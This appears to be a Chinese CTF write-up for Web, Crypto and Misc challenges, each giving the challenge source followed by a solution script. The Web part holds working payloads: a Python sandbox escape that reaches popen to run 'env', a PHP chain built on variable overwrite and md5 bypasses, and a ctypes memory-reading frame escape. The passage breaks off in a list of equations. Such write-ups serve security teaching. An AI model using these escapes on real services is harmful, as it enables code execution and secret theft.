Web

菜狗工具#1

源码:

from flask import *
import io
import os

app = Flask(__name__)
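# Builtin names withheld from the executed script.  This is a denylist of *names* only -- it
# removes entries from the table the script sees, nothing more.
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__',
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input',
]

# Read the builtins through the ``builtins`` module.  ``__builtins__`` is the module only when
# this file runs as ``__main__``; when it is imported it is a plain dict and the original
# ``__builtins__.__dict__`` raised AttributeError.  ``vars(builtins)`` is the same dict in both cases.
import builtins

new_builtins = {
    key: val for key, val in vars(builtins).items() if key not in black_list
}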

flag = "flag{xxxxxxxxx}"

@app.route("/")
def index():
    """Send the browser to the static front page."""
    front_page = "/static/index.html"
    return redirect(front_page)

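@app.post("/run")
def run():
    """Execute the submitted script under a reduced builtins table and return what it printed.

    Reads the ``script`` form field, runs it with ``exec`` using ``new_builtins`` plus a
    ``print`` replacement that writes into a per-request buffer, and returns the buffer's
    text.  Any ``Exception`` raised by the script is printed into the same buffer instead of
    propagating.

    Returns:
        The text the script produced via ``print`` (followed by the exception, if any).
    """
    script = str(request.form["script"])
    with io.StringIO() as out:

        def wrap_print(*args, **kwargs):
            # Force every call into this request's buffer, whatever ``file`` the script passed.
            kwargs["file"] = out
            print(*args, **kwargs)

        # Work on a per-request copy.  The original assigned ``wrap_print`` into the module-level
        # ``new_builtins`` and passed that shared dict to exec(), so concurrent requests could
        # print into each other's buffer and a script could leave entries behind for later ones.
        request_builtins = dict(new_builtins)
        request_builtins["print"] = wrap_print

        # NOTE(review): exec() of request-supplied source is the challenge's intended design; a
        # name denylist on __builtins__ is not an isolation boundary (the writeup below shows
        # why), so nothing reachable from this process should be considered protected.
        try:
            exec(script, {"__builtins__": request_builtins})
        except Exception as e:
            wrap_print(e)

        return out.getvalue()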

# Binds every interface (0.0.0.0), so the /run endpoint -- which exec()s request-supplied
# code -- is reachable from the network, not only from localhost.
app.run('0.0.0.0', port=9001)

把这个题当成一个SSTI去做就可以了(

exp:

a="".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']("env").read()
print(a)

ezPHP

源码:

<?php
// Challenge source, reproduced as given.  Reviewer remarks are marked NOTE(review).
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$a = 'O.U.C';

$query = $_SERVER['QUERY_STRING'];
// NOTE(review): parse_str() without a result array registers every query parameter as a
// variable in this scope, so a request can overwrite $a (or anything else) before the checks
// below.  Pass a second argument (parse_str($query, $params)) to keep them contained.
parse_str($query);
// The filter runs on the raw query string; the encoded forms %5f / %2E are matched
// case-insensitively (/i).
if (preg_match('/_|%5f|\.|%2E/i',$query)){
die('听说你是黑客');
}

echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
// NOTE(review): == between two md5() strings is a loose comparison; hashes that look numeric
// ("0e...") compare equal under it.  Use === or hash_equals() for hash comparisons.
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
echo "哎呦,不错喔".'<br>';
// PHP rewrites '.' and ' ' in incoming parameter names to '_', so this name can arrive without
// a literal underscore in the query string (the filter above does not cover it).
$O_U_C=$_GET['O_U_C'];
// NOTE(review): in '/^100$/' the $ anchor also matches before a trailing newline, so a value
// that is not exactly '100' can still pass; anchor with \z (or the /D modifier) instead.
if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
// NOTE(review): $_POST values may be arrays.  On the PHP versions where md5() of an array
// returns NULL (with a warning, suppressed by error_reporting(0)), both sides become NULL and
// === holds; validate with is_string() before hashing.
if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
echo '好,那么好'.'<br>';
// NOTE(review): the else-branch below discloses md5($secret.'ouc'), which is exactly the
// value this comparison expects for md5=ouc; a secret-keyed check should use hash_hmac() and
// must never echo a digest derived from the secret.
if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
}else{
echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
}
}else{
echo '不过如此';
}
}else{
die("不行嘛(´ェ`)");
}
}else{
echo '嗨害嗨 (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}

存在变量覆盖,把$a覆盖成想要的值绕过MD5弱比较。

接着是 !is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C),用%0a绕过 preg_match('/^100$/',$O_U_C)的判断。

MD5强碰撞用数组绕过

$_COOKIE["md5"]===md5($secret.urldecode($_GET['md5'])),因为给了md5($secret.'ouc'),因此cookie带上这个值,$_GET['md5']=ouc 即可。

payload:

GET: a=QNKCDZO&b=s878926199a&O+U+C=100%0a&md5=ouc

POST: md51[]=1&md52[]=2

Cookie: md5=06d92f344c7d8c89cb164353ca0fa070

菜狗工具#2

源码:

from flask import *
import io
import time

app = Flask(__name__)
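# Builtin names withheld from the executed script.  This is a denylist of *names* only -- it
# removes entries from the table the script sees, nothing more.
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__',
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input',
]

# Read the builtins through the ``builtins`` module.  ``__builtins__`` is the module only when
# this file runs as ``__main__``; when it is imported it is a plain dict and the original
# ``__builtins__.__dict__`` raised AttributeError.  ``vars(builtins)`` is the same dict in both cases.
import builtins

new_builtins = {
    key: val for key, val in vars(builtins).items() if key not in black_list
}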

flag = "flag{xxxxxx}"
flag = "DISPOSED"

@app.route("/")
def index():
    """Send the browser to the static front page."""
    front_page = "/static/index.html"
    return redirect(front_page)

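@app.post("/run")
def run():
    """Execute the submitted script under a reduced builtins table and return what it printed.

    Reads the ``script`` form field, runs it with ``exec`` using ``new_builtins`` plus a
    ``print`` replacement that writes into a per-request buffer, and returns the buffer's
    text.  Any ``Exception`` raised by the script is printed into the same buffer instead of
    propagating.

    Returns:
        The text the script produced via ``print`` (followed by the exception, if any).
    """
    script = str(request.form["script"])
    with io.StringIO() as out:

        def wrap_print(*args, **kwargs):
            # Force every call into this request's buffer, whatever ``file`` the script passed.
            kwargs["file"] = out
            print(*args, **kwargs)

        # Work on a per-request copy.  The original assigned ``wrap_print`` into the module-level
        # ``new_builtins`` and passed that shared dict to exec(), so concurrent requests could
        # print into each other's buffer and a script could leave entries behind for later ones.
        request_builtins = dict(new_builtins)
        request_builtins["print"] = wrap_print

        # NOTE(review): exec() of request-supplied source is the challenge's intended design; a
        # name denylist on __builtins__ is not an isolation boundary (the writeup below shows
        # why), so nothing reachable from this process should be considered protected.
        try:
            exec(script, {"__builtins__": request_builtins})
        except Exception as e:
            wrap_print(e)

        return out.getvalue()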

# Start-up delay before serving; per the original comment the source file is gone by the time
# the app is up, so afterwards the program text exists only in the interpreter's memory.
time.sleep(5) # current source file is deleted
# Binds every interface (0.0.0.0), so the /run endpoint -- which exec()s request-supplied
# code -- is reachable from the network, not only from localhost.
app.run('0.0.0.0', port=9001)

源码和一差不多,只不过这次是运行后源码被删除了。

参考链接: L3HCTF Just a pyjail

大致思路:

  1. 源码被删除,但程序运行了,内存里肯定是有源码的。
  2. 没有 /proc目录,不能通过读文件的方式读内存(参考session伪造利用文件任意读取读取key)
  3. 可以利用指针,把内存的内容读出来,但需要定位一个大致的范围,盲目读取浪费时间。

先利用栈帧逃逸到全局,后续需要用到全局的flag的地址。

接着是利用 ctypes模块的指针,将flag地址周围的值读一下,实现一个从内存读源码的操作。

这里我用了char 指针,读出来的是一个字符串,再加上flag头作为判断,可以很快读出flag。

每次位移8的倍数。(可以自行对比任意两个变量的地址,可以发现它们的差值都是8的倍数)

exp:

def f():
yield g.gi_frame.f_back.f_back

g = f()
frame = [x for x in g][0]
b = frame.f_back.f_globals
flag_id=id(b['flag'])
ctypes = b["__builtins__"].__import__('ctypes')
#print(ctypes)

for i in range(10000):
txt = ctypes.cast((flag_id-8*i),ctypes.c_char_p).value
if b"flag{" in txt:
print(txt)
break

贪吃蛇

wasm逆向和debug。

参考链接: WebAssembly

在线网站:wat2wasm demo

先debug,找一个吃到道具能进入debug的断点,然后一直往下找,可以看到 114514 的赋值过程

我这里是把断点打在 call $wbg.__wbg_crypto_d05b68a3572bb8ca

一直往下追,可以看到 114514 的转换代码。

修改这部分代码,然后通过在线工具把它再转回 wasm ,之后再用新的 wasm debug。

这里我把 $var16 改成 0

loop $label8
local.get $var16
i64.const 0
i64.add
local.set $var16
local.get $var1
i32.const 4
i32.add
local.set $var1
local.get $var3
i32.const 1
i32.sub
local.tee $var3
br_if $label8
end $label8

编译得到wasm,回到本地调试,先在本地用python起一个http服务

python -m http.server -b localhost

接着访问 localhost:8000 即可得到flag

爆率真的高

在线网站:JavaScript Deobfuscator

通过在线网站反混淆可以得到比较简洁的源码

function _0x36f7d7() {
var _0x2b390b = function () {
var _0xc52e83 = true;
return function (_0x25d063, _0x14b0af) {
var _0x435e43 = _0xc52e83 ? function () {
if (_0x14b0af) {
var _0x278c9e = _0x14b0af['apply'](_0x25d063, arguments);
return _0x14b0af = null, _0x278c9e;
}
} : function () {};
return _0xc52e83 = false, _0x435e43;
};
}(),
_0x12600c = _0x2b390b(this, function () {
return _0x12600c['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0x12600c)['search']('(((.+)+)+)+$');
});
return _0x12600c(), 'line-height:200px; padding-block:100px; padding-left:200px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' viewBox=\'0 0 200 200\'%3E%3Cstyle%3E .wrapper %7B font-family: sans-serif; perspective: 500px; text-align: center; position: relative; width: 100%25; height: 100%25; %7D .cube %7B position: absolute; top: 20%25; left: 30%25; transform-style: preserve-3d; transform: rotateY(40deg) rotateX(-40deg); animation: wiggle_wiggle_wiggle_wiggle_wiggle_yeah 3s ease-in-out infinite alternate; %7D .side %7B width: 8rem; height: 8rem; background: rgba(0, 0, 0, 0.8); display: inline-block; position: absolute; line-height: 8rem; color: %23fff; text-align: center; box-sizing: border-box; border: 3px solid %23f00; font-size: 4rem; %7D .front %7B transform: translateZ(4rem); z-index: 1; %7D .back %7B transform: rotateY(180deg) translateZ(4rem); %7D .left %7B transform: rotateY(-90deg) translateZ(4rem); z-index: 1; %7D .right %7B transform: rotateY(90deg) translateZ(4rem); %7D .top %7B transform: rotateX(90deg) translateZ(4rem); %7D .bottom %7B transform: rotateX(-90deg) translateZ(4rem); %7D @keyframes wiggle_wiggle_wiggle_wiggle_wiggle_yeah %7B 0%25 %7B transform: rotateY({a}deg) rotateX(-{a}deg); %7D 100%25 %7B transform: rotateY({b}deg) rotateX(-{b}deg); %7D %7D %3C/style%3E%3CforeignObject width=\'100%25\' height=\'100%25\'%3E%3Cdiv xmlns=\'http://www.w3.org/1999/xhtml\' class=\'wrapper\'%3E%3Cdiv class=\'cube\'%3E%3Cdiv class=\'side front\'%3E1%3C/div%3E%3Cdiv class=\'side back\'%3E2%3C/div%3E%3Cdiv class=\'side left\'%3E3%3C/div%3E%3Cdiv class=\'side right\'%3E4%3C/div%3E%3Cdiv class=\'side top\'%3E5%3C/div%3E%3Cdiv class=\'side bottom\'%3E6%3C/div%3E%3C/div%3E%3C/div%3E%3C/foreignObject%3E%3C/svg%3E")||line-height:50px; padding-left:500px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\'%3E %3Cpath id=\'path1394\' 
style=\'fill:none%3Bstroke:%23000000%3Bstroke-width:0.264583px%3Bstroke-linecap:butt%3Bstroke-linejoin:miter%3Bstroke-opacity:1\' d=\'m 221.50185,6.5147602 3.99292,2.94215 0.4203,14.0802888 3.78277,2.521842 -3.78277,2.731996 -0.21015,14.500595 -3.99292,2.942151 m -75.76812,-32.68897 -0.18289,26.152093 4.20628,-0.18288 0.18289,-0.365766 m 39.51762,-10.582347 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 17.49855,11.609045 -0.18288,-12.070196 2.56034,-3.840517 6.76663,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 M 79.249122,29.337219 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 106.868818,-7.460739 -10.0585,0.731527 -3.10899,7.315272 0.73153,5.852215 2.74322,3.108989 8.77833,0.182883 0.73152,-0.182883 m -29.84386,-8.105803 8.77833,-0.365762 2.0117,-2.743227 -2.37747,-3.291872 h -8.9612 l -2.19458,4.0234 0.18288,7.863914 3.29187,2.560347 8.0468,-0.365766 m -36.86029,-9.455308 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m -5.20252,-3.51165 -7.58959,-0.182882 -2.28602,3.931959 V 32.0765 l 8.86976,0.182882 1.5545,1.554493 -0.27433,4.206283 -1.46305,2.377461 -8.32112,0.09144 h 0.4572 m -17.006391,0.457205 -0.18288,-12.070196 2.56034,-3.840517 6.766631,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 m -32.373283,-17.720279 -10.058498,0.731527 -3.108989,7.315272 0.731526,5.852215 2.743226,3.108989 8.778325,0.182883 0.731528,-0.182883 m -15.544951,1.645936 0.731528,0.365766 -4.0234,-2.926109 L 56.87623,24.689039 53.401478,22.128694 57.607759,18.836823 57.241995,6.5837438 59.985222,3.4747537 m -17.008004,34.0160083 8.961204,-0.18288 v 0 m -8.961204,0.18288 -0.182883,-10.058495 9.144087,-0.182883 v 22.860222 h -8.961204 l 0.548645,-0.365765 H 43.34298 m -15.54495,-27.98091 5.852215,-0.182882 0.182883,16.276478 m -0.365763,-10.790025 -7.13239,0.182882 V 
38.22229 l 12.43596,-0.365763 V 37.490762 M 19.202586,12.43596 l -0.182882,26.152093 4.206281,-0.18288 0.182882,-0.365766 M 14.996305,12.618842 H 10.241379 L 10.058498,38.039407 5.8522165,37.856527 M 3.8405173,22.67734 15.910714,22.494458\' %2F%3E %3C%2Fsvg%3E")||console.log||console.clear||Math.random||Math.floor||setTimeout';
}
// Resolve the helpers packed at the end of the obfuscated string.  split('||') yields
// [css-normal, css-flag, "console.log", "console.clear", "Math.random", "Math.floor", "setTimeout"].
var _0x4d032d = eval(_0x36f7d7()['split']('||')[2]),   // console.log
_0x4d3fb4 = eval(_0x36f7d7()['split']('||')[3]),   // console.clear
_0x280bbf = eval(_0x36f7d7()['split']('||')[4]),   // Math.random
_0x3ede16 = eval(_0x36f7d7()['split']('||')[5]),   // Math.floor (not used below)
_0x13a155 = eval(_0x36f7d7()['split']('||')[6]);   // setTimeout
// Self-application: the outer IIFE returns f(f), i.e. the inner animation function, which is
// then invoked immediately and re-schedules itself via setTimeout.
(function (_0x5da15b) {
return _0x5da15b(_0x5da15b);
})(function (_0xc4be8d) {
return function (_0x3a3176) {
// 100 styled console.log frames; {a}/{b} in the CSS are rotation angles sweeping 0..60 and 60..0.
for (var _0x7936d0 = 0; _0x7936d0 < 100; _0x7936d0++) {
var _0x38d961 = false,
_0x48b8aa = _0x36f7d7()['split']('||')[0],
_0x48a4aa = 60 * _0x7936d0 / 100,
_0x54870d = 60 - 60 * _0x7936d0 / 100;
// Roughly 1 in 10000 frames: use the second CSS payload (the one carrying the flag drawing)
// instead, and clear the console right after it is printed.
_0x280bbf() >= 0.9999 && (_0x48b8aa = _0x36f7d7()['split']('||')[1], _0x38d961 = true);
_0x4d032d('%c ', _0x48b8aa['replace'](/\{a\}/gm, _0x48a4aa + '')['replace'](/\{b\}/gm, _0x54870d + ''));
if (_0x38d961) _0x4d3fb4();
}
// Run the whole burst again after 500 ms; console.clear at 450 ms wipes the previous burst first.
_0x13a155(function () {
_0xc4be8d(_0xc4be8d)();
}, 500), _0x13a155(_0x4d3fb4, 450);
};
})();

通过分析,可以知道当 Math.random>= 0.9999 时,会输出flag,手动调整一下代码,即可得到flag。

var _0x36f7d7 = 'line-height:200px; padding-block:100px; padding-left:200px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' viewBox=\'0 0 200 200\'%3E%3Cstyle%3E .wrapper %7B font-family: sans-serif; perspective: 500px; text-align: center; position: relative; width: 100%25; height: 100%25; %7D .cube %7B position: absolute; top: 20%25; left: 30%25; transform-style: preserve-3d; transform: rotateY(40deg) rotateX(-40deg); animation: wiggle_wiggle_wiggle_wiggle_wiggle_yeah 3s ease-in-out infinite alternate; %7D .side %7B width: 8rem; height: 8rem; background: rgba(0, 0, 0, 0.8); display: inline-block; position: absolute; line-height: 8rem; color: %23fff; text-align: center; box-sizing: border-box; border: 3px solid %23f00; font-size: 4rem; %7D .front %7B transform: translateZ(4rem); z-index: 1; %7D .back %7B transform: rotateY(180deg) translateZ(4rem); %7D .left %7B transform: rotateY(-90deg) translateZ(4rem); z-index: 1; %7D .right %7B transform: rotateY(90deg) translateZ(4rem); %7D .top %7B transform: rotateX(90deg) translateZ(4rem); %7D .bottom %7B transform: rotateX(-90deg) translateZ(4rem); %7D @keyframes wiggle_wiggle_wiggle_wiggle_wiggle_yeah %7B 0%25 %7B transform: rotateY({a}deg) rotateX(-{a}deg); %7D 100%25 %7B transform: rotateY({b}deg) rotateX(-{b}deg); %7D %7D %3C/style%3E%3CforeignObject width=\'100%25\' height=\'100%25\'%3E%3Cdiv xmlns=\'http://www.w3.org/1999/xhtml\' class=\'wrapper\'%3E%3Cdiv class=\'cube\'%3E%3Cdiv class=\'side front\'%3E1%3C/div%3E%3Cdiv class=\'side back\'%3E2%3C/div%3E%3Cdiv class=\'side left\'%3E3%3C/div%3E%3Cdiv class=\'side right\'%3E4%3C/div%3E%3Cdiv class=\'side top\'%3E5%3C/div%3E%3Cdiv class=\'side bottom\'%3E6%3C/div%3E%3C/div%3E%3C/div%3E%3C/foreignObject%3E%3C/svg%3E")||line-height:50px; padding-left:500px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\'%3E %3Cpath id=\'path1394\' 
style=\'fill:none%3Bstroke:%23000000%3Bstroke-width:0.264583px%3Bstroke-linecap:butt%3Bstroke-linejoin:miter%3Bstroke-opacity:1\' d=\'m 221.50185,6.5147602 3.99292,2.94215 0.4203,14.0802888 3.78277,2.521842 -3.78277,2.731996 -0.21015,14.500595 -3.99292,2.942151 m -75.76812,-32.68897 -0.18289,26.152093 4.20628,-0.18288 0.18289,-0.365766 m 39.51762,-10.582347 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 17.49855,11.609045 -0.18288,-12.070196 2.56034,-3.840517 6.76663,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 M 79.249122,29.337219 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 106.868818,-7.460739 -10.0585,0.731527 -3.10899,7.315272 0.73153,5.852215 2.74322,3.108989 8.77833,0.182883 0.73152,-0.182883 m -29.84386,-8.105803 8.77833,-0.365762 2.0117,-2.743227 -2.37747,-3.291872 h -8.9612 l -2.19458,4.0234 0.18288,7.863914 3.29187,2.560347 8.0468,-0.365766 m -36.86029,-9.455308 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m -5.20252,-3.51165 -7.58959,-0.182882 -2.28602,3.931959 V 32.0765 l 8.86976,0.182882 1.5545,1.554493 -0.27433,4.206283 -1.46305,2.377461 -8.32112,0.09144 h 0.4572 m -17.006391,0.457205 -0.18288,-12.070196 2.56034,-3.840517 6.766631,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 m -32.373283,-17.720279 -10.058498,0.731527 -3.108989,7.315272 0.731526,5.852215 2.743226,3.108989 8.778325,0.182883 0.731528,-0.182883 m -15.544951,1.645936 0.731528,0.365766 -4.0234,-2.926109 L 56.87623,24.689039 53.401478,22.128694 57.607759,18.836823 57.241995,6.5837438 59.985222,3.4747537 m -17.008004,34.0160083 8.961204,-0.18288 v 0 m -8.961204,0.18288 -0.182883,-10.058495 9.144087,-0.182883 v 22.860222 h -8.961204 l 0.548645,-0.365765 H 43.34298 m -15.54495,-27.98091 5.852215,-0.182882 0.182883,16.276478 m -0.365763,-10.790025 -7.13239,0.182882 V 
38.22229 l 12.43596,-0.365763 V 37.490762 M 19.202586,12.43596 l -0.182882,26.152093 4.206281,-0.18288 0.182882,-0.365766 M 14.996305,12.618842 H 10.241379 L 10.058498,38.039407 5.8522165,37.856527 M 3.8405173,22.67734 15.910714,22.494458\' %2F%3E %3C%2Fsvg%3E")||console.log||console.clear||Math.random||Math.floor||setTimeout';


// Print the second CSS payload (index 1, the one the random branch normally gates) a single
// time, with the rotation placeholders fixed at 0 and 60.
var _0x38d961 = false;
var _0x48b8aa = _0x36f7d7.split('||')[1];
var _0x48a4aa = 0;
var _0x54870d = 60;
console.log('%c ', _0x48b8aa.replace(/\{a\}/gm, String(_0x48a4aa)).replace(/\{b\}/gm, String(_0x54870d)));


// flag{consolecon}

Crypto

NeXT RSA

源码:

import sympy
import libnum

flag="flag{" + "???" + "}"
m = libnum.s2n(flag)  # the flag's bytes as one big integer

# NOTE(review): q is the very next prime after p, so the two factors of n differ by a tiny
# amount.  Such an n is factored almost instantly (Fermat's method, or yafu as the writeup
# does); RSA needs two independently chosen random primes.
p = sympy.randprime(1<<1024, 1<<1025)
q = sympy.nextprime(p)

n = p*q
r = (p-1)*(q-1)  # Euler's totient of n; computed but not used in this script
e = 65537

c = pow(m, e, n)

print(n, e, c)
# output:
# 80044118049755180996754407858488943779355738585718372337839486032339412481191013051614126608584578841408197524632831442032118319629160505851518198448787590483634506563248531254421862061651099856312546562506221294620627871718678484548245902274972044599314097339549053518589561289734819710218838311181044519738709148493164321955860982700783886286661558574861608455547990794798848491695189544811325833194530596317989718866319530140199263278168146224240677087191093183415595617994125075880280632369616506148501757653260154487000183157405531772172082897743929126980157956142627803176227942226654177011633301413616266656761 65537 23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544

p,q很接近,用 yafu 分解得到p和q即可解出flag。

import gmpy2
from Crypto.Util.number import long_to_bytes

p = 282920692155514106003547048252671592686895074005075494866237126606538876862084869899305020449888011718393569492453806569130653155089937273700159218521084322216860665654750144997585080033855855153273003202489776223708632688666001227407722693831850421351342688928312148753704357824181010753634918089083718774469

q = 282920692155514106003547048252671592686895074005075494866237126606538876862084869899305020449888011718393569492453806569130653155089937273700159218521084322216860665654750144997585080033855855153273003202489776223708632688666001227407722693831850421351342688928312148753704357824181010753634918089083718773669


n=p*q

e = 65537
#填c
c=23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544

d = gmpy2.invert(e, (p - 1) * (q - 1))  # private exponent: e^-1 mod phi(n)
m = pow(c, d, n)                        # RSA decryption of the ciphertext
flag = long_to_bytes(m)                 # integer back to the original bytes
print(flag)
# flag{n0t_s3Cure_4t_aIl}

Base64*rot13

CyberChef 梭了。

模!

源码:

from math import factorial
from functools import reduce

flag = "flag{xxxxxxxxx}"

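def mooooo(s: str) -> int:
    """Pack ``s`` into one integer, one byte per character.

    Each character contributes ``factorial(ord(ch)) % 233`` (a value in 0..232, so it fits in
    eight bits).  The result is big-endian: the first character ends up in the highest byte.

    Args:
        s: Text to encode; the empty string encodes to 0.

    Returns:
        The packed integer.
    """
    res = 0
    for ch in s:
        code = ord(ch)
        # Any integer >= 233 has 233 as a factor of its factorial, so the residue is 0; skip
        # the (potentially huge) factorial the original computed for every code point.
        digit = 0 if code >= 233 else factorial(code) % 233
        res = (res << 8) | digit
    return res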

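# Alphabet the flag is restricted to: lowercase letters plus the braces.
table = "abcdefghijklmnopqrstuvwxyz{}"
# Same check as the original reduce(lambda p, i: (i in table) * p, flag, True), written as
# all() instead of multiplying booleans.
assert all(ch in table for ch in flag)

print(mooooo(flag))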
# output: 2508450541438803643416583335895451914701844680466330955847

爆破每一位即可。

from math import factorial

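# Output of mooooo(flag) as printed by the challenge.
res = 2508450541438803643416583335895451914701844680466330955847
table = "abcdefghijklmnopqrstuvwxyz{}"

# Invert the per-character map: residue -> character.  If two characters shared a residue the
# later one would silently win the slot.
table_num = {(factorial(ord(c)) % 233): c for c in table}

# Split the integer into its bytes (big-endian, one per character).  The original did this with
# "0" + bin(res)[2:] and 8-character slices, which only lines up when the leading byte is in
# 64..127 (bit length exactly 7); int.to_bytes needs no such luck.
packed = res.to_bytes((res.bit_length() + 7) // 8, "big")
decoded = "".join(table_num[b] for b in packed)
print(decoded, end='')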

# flag{dalaodalaohaolihai}

Misc

一眼盯帧

仔细看视频,发现视频在有些帧里面藏了东西。先把特殊的帧提取出来。

import cv2
import numpy as np
import matplotlib.pyplot as plt

video = cv2.VideoCapture('iGotSmokynomial.mp4')

frame_count = 0

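def get_background_color(image_path):
    """Return the most frequent grey level (0-255) of the image stored at ``image_path``.

    The image is converted to greyscale and a 256-bin histogram is taken; the fullest bin is
    treated as the background colour.  The caller compares it with 255 to keep only the
    white-background frames.

    Args:
        image_path: Path to an image ``cv2.imread`` can decode.

    Returns:
        The dominant grey level as a plain ``int``.

    Raises:
        FileNotFoundError: if ``cv2.imread`` cannot read the file.  It returns ``None`` instead
            of raising, which in the original surfaced as an opaque error inside ``cvtColor``.
    """
    image = cv2.imread(image_path)
    if image is None:
        raise FileNotFoundError(f"cannot read image: {image_path}")
    gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    hist = cv2.calcHist([gray_image], [0], None, [256], [0, 256]).flatten()
    return int(np.argmax(hist))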

# Dump frames as ./out/frame_<k>.jpg; k only advances for frames whose dominant grey level is
# white (255), so any other frame is overwritten by the next one read from the video.
while True:
    ret, frame = video.read()
    if not ret:
        break
    frame_path = f'./out/frame_{frame_count}.jpg'
    cv2.imwrite(frame_path, frame)
    if get_background_color(frame_path) == 255:
        frame_count += 1

video.release()
cv2.destroyAllWindows()

之后得到62张藏有算式的图片,把图片上的文字提取出来。

import easyocr 
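def read_num(filename, ocr=None):
    """OCR one frame and rebuild its equation's left-hand side as a Python expression.

    Every OCR line containing ``*`` is taken to be a coefficient such as ``40*``; the text
    before the ``*`` is paired with ``a1``, ``a2``, ... in reading order and the terms are
    joined as ``"<c1> * a1 + <c2> * a2 + ..."``.  The last OCR line is returned separately as
    the right-hand side.

    Args:
        filename: Image to run through the reader.
        ocr: Object with an easyocr-style ``readtext(filename, detail=0)`` method.  Defaults
            to the module-level ``reader`` so existing callers are unaffected.

    Returns:
        ``(lhs, rhs)`` -- the joined coefficient expression and the last OCR line.

    Raises:
        IndexError: if the reader returns no text at all (there is no right-hand side).
    """
    engine = reader if ocr is None else ocr
    lines = engine.readtext(filename, detail=0)
    # Collect the terms and join them, instead of tracking a "first term" counter by hand.
    terms = []
    for line in lines:
        if '*' in line:
            terms.append(f"{line.split('*')[0]} * a{len(terms) + 1}")
    return ' + '.join(terms), lines[-1]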

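reader = easyocr.Reader(['ch_sim','en'],gpu = False)

# One line per frame, "<lhs> == <rhs>", for the 62 white-background frames extracted above.
# The with-block closes (and flushes) the file even if OCR of a frame raises; the original
# opened it by hand and would have left it unflushed on an exception.
with open('out.txt', 'w') as f:
    for i in range(62):
        a, b = read_num(f'./out/frame_{i}.jpg')
        f.write(a + ' == ' + b + '\n')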

提取出来的文字并不完全正确,部分0识别成8了,手动修正,只需要检查0对不对。

因为有31个未知数,至少检查31个算式即可,我这里检查了32个,方便校错。

40 * a1 + 42 * a2 + 69 * a3 + 91 * a4 + 91 * a5 + 74 * a6 + 45 * a7 + 49 * a8 + 99 * a9 + 41 * a10 + 79 * a11 + 26 * a12 + 51 * a13 + 74 * a14 + 84 * a15 + 31 * a16 + 74 * a17 + 11 * a18 + 87 * a19 + 76 * a20 + 26 * a21 + 40 * a22 + 13 * a23 + 31 * a24 + 39 * a25 + 7 * a26 + 84 * a27 + 65 * a28 + 25 * a29 + 88 * a30 + 13 * a31 == 159700
76 * a1 + 23 * a2 + 47 * a3 + 95 * a4 + 56 * a5 + 94 * a6 + 9 * a7 + 89 * a8 + 1 * a9 + 27 * a10 + 64 * a11 + 54 * a12 + 77 * a13 + 57 * a14 + 11 * a15 + 80 * a16 + 61 * a17 + 98 * a18 + 14 * a19 + 72 * a20 + 67 * a21 + 98 * a22 + 66 * a23 + 26 * a24 + 11 * a25 + 36 * a26 + 94 * a27 + 66 * a28 + 99 * a29 + 64 * a30 + 40 * a31 == 171444
